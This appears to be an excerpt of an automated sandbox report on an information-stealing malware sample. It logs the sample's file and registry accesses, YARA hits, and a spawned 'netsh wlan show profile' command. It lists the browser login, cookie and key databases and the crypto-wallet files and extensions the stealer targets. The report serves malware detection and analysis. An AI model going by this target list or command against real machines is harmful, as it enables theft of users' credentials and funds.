                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FD8E.exe VolumeInformation
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00426B79 AbortSystemShutdownA,RtlLeaveCriticalSection,FreeEnvironmentStringsA,EqualSid,ReadEventLogW,CreateNamedPipeA,SetMessageWaitingIndicator,0_2_00426B79
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00402D53 GetLocalTime,SystemTimeToFileTime,GetLastError,GetLastError,GetLastError,8_2_00402D53
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0A1927 GetUserNameW,21_2_00007FF73D0A1927
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00416D66 __get_daylight,__get_daylight,____lc_codepage_func,__getenv_helper_nolock,GetTimeZoneInformation,0_2_00416D66
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004067D5 KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,GetCommandLineW,GetCommandLineW,wsprintfW,GetModuleFileNameW,wsprintfW,GetCommandLineW,GetCurrentProcess,SetProcessWorkingSetSize,CoInitialize,GetKeyState,GetFileAttributesW,SetCurrentDirectoryW,MessageBoxA,8_2_004067D5
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 30.0.E35F.exe.db8096.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.0.E35F.exe.db8096.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.0.E35F.exe.d30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.2767631716.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: E35F.exe PID: 6072, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\E35F.exe, type: DROPPED
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6032, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 35.2.5390.exe.4c0e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.5390.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.3.5390.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000003.2383099821.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.2578790306.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1708892086.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1708988921.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1984144647.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2438465954.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2438798088.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1988409529.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 25.0.9D1E.exe.fb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\9D1E.exe, type: DROPPED
                      Source: InstallUtil.exe, 0000001A.00000002.2388752727.00000000008F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: KBWallets/ElectrumB
                      Source: InstallUtil.exe, 0000001A.00000002.2395264074.0000000000AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                      Source: InstallUtil.exe, 0000001A.00000002.2388752727.00000000008F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: KBWallets/ExodusBC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4L{B%appdata%\Exodus\exodus.walletBkeystoreyKB
                      Source: InstallUtil.exe, 0000001A.00000002.2388752727.00000000008F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: KBWallets/ExodusBC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4L{B%appdata%\Exodus\exodus.walletBkeystoreyKB
                      Source: InstallUtil.exe, 0000001A.00000002.2388752727.00000000008F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: KBapp-store.jsonBWallets/BinanceC:\Users\user\AppData\Roaming\BinanceB%appdata%\Binance
                      Source: InstallUtil.exe, 0000001A.00000002.2388752727.00000000008F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: KBWallets/EthereumBW[
                      Source: InstallUtil.exe, 0000001A.00000002.2395264074.0000000000AFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: 9D1E.exe, 00000019.00000000.2171928326.0000000000FB2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: set_UseMachineKeyStore
                      Source: InstallUtil.exe, 0000001A.00000002.2388752727.00000000008F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: {BC:\Users\user\AppData\Roaming\Ledger Live+L{B%appdata%\Ledger Live
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
